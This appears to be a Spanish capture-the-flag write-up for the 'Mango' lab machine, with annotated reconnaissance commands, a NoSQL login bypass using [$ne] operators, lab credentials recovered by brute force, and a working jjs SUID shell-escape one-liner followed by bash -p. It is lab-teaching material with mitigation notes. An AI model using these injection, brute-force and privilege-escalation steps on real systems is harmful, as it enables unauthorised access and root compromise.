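# Each scan gets its own -oA basename so one run does not overwrite the
# output files (.nmap/.gnmap/.xml) of another.

# Full TCP sweep with aggressive detection (-A) plus the "vuln" NSE category.
# --min-rate=10000 trades accuracy for speed, so open ports can be missed;
# treat this pass as a quick first look and confirm with the scan below.
nmap -A -p- -oA mango-vuln 10.129.1.219 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Default scripts, service versions and OS detection on all TCP ports.
nmap -sC -sV -O -p- -oA mango 10.129.1.219

# UDP sweep of all ports.
nmap -sU -O -p- -oA mango-udp 10.129.1.219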

# Web server scan of the HTTP service on port 80.
nikto -h 10.129.1.219:80

Pasted image 20211214084025.png

Pasted image 20211214084139.png

# Fingerprint the web stack served on the bare IP.
whatweb http://10.129.1.219

Pasted image 20211214084231.png

# Map the name to the target IP so name-based virtual hosts can be requested.
# tee -a appends; sudo is needed because /etc/hosts is root-owned.
echo "10.129.1.219 mango.htb" | sudo tee -a /etc/hosts

Pasted image 20211214085324.png

Nos dirigimos a https://mango.htb

Pasted image 20211214085451.png

# Search the local Exploit-DB copy for entries matching "mango".
searchsploit mango

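# Inspect the TLS certificate presented by the HTTPS service.
# -connect expects host:port; 443 is the port behind the https:// URLs used
# on this page. The certificate's subject / alternative names are worth
# reading because they can list additional virtual-host names.
openssl s_client -connect 10.129.1.219:443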

Pasted image 20211214085850.png

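# Add the second virtual host. The name must match the one browsed to
# afterwards (staging-order.mango.htb); presumably it was read from the TLS
# certificate shown by openssl -- confirm against that output.
echo "10.129.1.219 staging-order.mango.htb mango.htb" | sudo tee -a /etc/hosts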

Pasted image 20211214090059.png

Nos dirigimos a https://staging-order.mango.htb

Pasted image 20211214090451.png

Nos dirigimos a http://staging-order.mango.htb

Pasted image 20211214090527.png

Tratamos de modificar los parámetros username y password de la petición en Burp Suite

Pasted image 20211214091213.png

Tratamos de modificar la petición para probar una inyección SQL

Pasted image 20211214091549.png

Seguimos probando, ahora con sleep, para ver si hay una inyección ciega basada en tiempo

Pasted image 20211214091709.png

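Ahora metemos operadores de consulta NoSQL (MongoDB) como [$ne] en los parámetros. Esto funciona cuando la aplicación pasa los parámetros a la consulta sin comprobar que sean cadenas; la mitigación es validar el tipo de username y password antes de construir la consulta.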

Pasted image 20211214092923.png

Creamos un script para poder usar fuerza bruta

Pasted image 20211214100508.png

Ahora hacemos un script para usar fuerza bruta en la contraseña.

Pasted image 20211214101832.png

Credenciales-> mango:h3mXK8RhU~f{]f5H

Pasted image 20211214103038.png

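cd /

# List files with the SUID bit set (mode 4000) under the current directory,
# i.e. the whole filesystem after the cd above. The start path is given
# explicitly because not every find implementation defaults to ".", and the
# stray backslash before -perm (a markdown escape) is dropped.
# Permission-denied noise goes to /dev/null.
find . -perm -4000 -type f 2>/dev/null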

Pasted image 20211214120952.png

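Vemos que jjs aparece entre los binarios con SUID, lo que permite escalar privilegios. Un intérprete como jjs no debería tener el bit SUID activado.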

Pasted image 20211214124028.png

Pasted image 20211214124245.png

Consultamos la entrada de jjs en GTFOBins

Pasted image 20211214124318.png

    # Pipes a JavaScript one-liner into ./jjs that calls Runtime.exec to start
    # /bin/sh with -p, with stdin/stdout/stderr attached to the current tty.
    # This only yields elevated privileges because jjs is presumably SUID here
    # (see the find output above); removing the SUID bit from jjs closes it.
    echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | ./jjs

# Check the mode bits of /bin/bash.
# NOTE(review): the step that changed them is not shown on this page;
# presumably the SUID bit was set from the shell obtained above -- confirm.
ls -l /bin/bash

# -p starts bash in privileged mode, so it does not reset the effective UID.
bash -p

Pasted image 20211214124903.png
